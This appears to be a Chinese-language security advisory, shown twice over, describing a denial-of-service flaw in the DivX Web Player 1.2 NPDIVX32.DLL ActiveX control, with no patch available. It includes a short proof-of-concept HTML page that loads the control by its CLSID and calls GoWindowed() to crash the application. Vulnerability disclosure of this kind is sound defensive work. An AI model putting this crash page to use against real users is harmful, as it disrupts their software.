VULHUB ™

DivX Web Player是一款适用于多浏览器的插件。 DivX Web Player NPDIVX32.DLL ActiveX控件不正确处理参数数据，远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。 由于NPDIVX32.DLL ActiveX控件对用户提交的参数缺少过滤，构建恶意WEB页，诱使用户访问，可导致应用程序崩溃： &lt;html&gt; &lt;OBJECT id=DivXBrowserPlugin style=&quot;LEFT: 0px; WIDTH: 1px; TOP: 0px; HEIGHT: 1px&quot; height=1 width=1 classid=clsid:67DABFBF-D0AB-41fa-9C46-CC0F21721616&gt; &lt;PARAM NAME=&quot;_cx&quot; VALUE=&quot;26&quot;&gt; &lt;PARAM NAME=&quot;_cy&quot; VALUE=&quot;26&quot;&gt;&lt;/OBJECT&gt; &lt;script&gt; DivXBrowserPlugin.GoWindowed() &lt;/script&gt; DivX Web Player 1.2 目前没有解决方案提供： <a href="http://www.divx.com/divx/webplayer/" target="_blank">http://www.divx.com/divx/webplayer/</a>

DivX Web Player是一款适用于多浏览器的插件。 DivX Web Player NPDIVX32.DLL ActiveX控件不正确处理参数数据，远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。 由于NPDIVX32.DLL ActiveX控件对用户提交的参数缺少过滤，构建恶意WEB页，诱使用户访问，可导致应用程序崩溃： &lt;html&gt; &lt;OBJECT id=DivXBrowserPlugin style=&quot;LEFT: 0px; WIDTH: 1px; TOP: 0px; HEIGHT: 1px&quot; height=1 width=1 classid=clsid:67DABFBF-D0AB-41fa-9C46-CC0F21721616&gt; &lt;PARAM NAME=&quot;_cx&quot; VALUE=&quot;26&quot;&gt; &lt;PARAM NAME=&quot;_cy&quot; VALUE=&quot;26&quot;&gt;&lt;/OBJECT&gt; &lt;script&gt; DivXBrowserPlugin.GoWindowed() &lt;/script&gt; DivX Web Player 1.2 目前没有解决方案提供： <a href="http://www.divx.com/divx/webplayer/" target="_blank">http://www.divx.com/divx/webplayer/</a>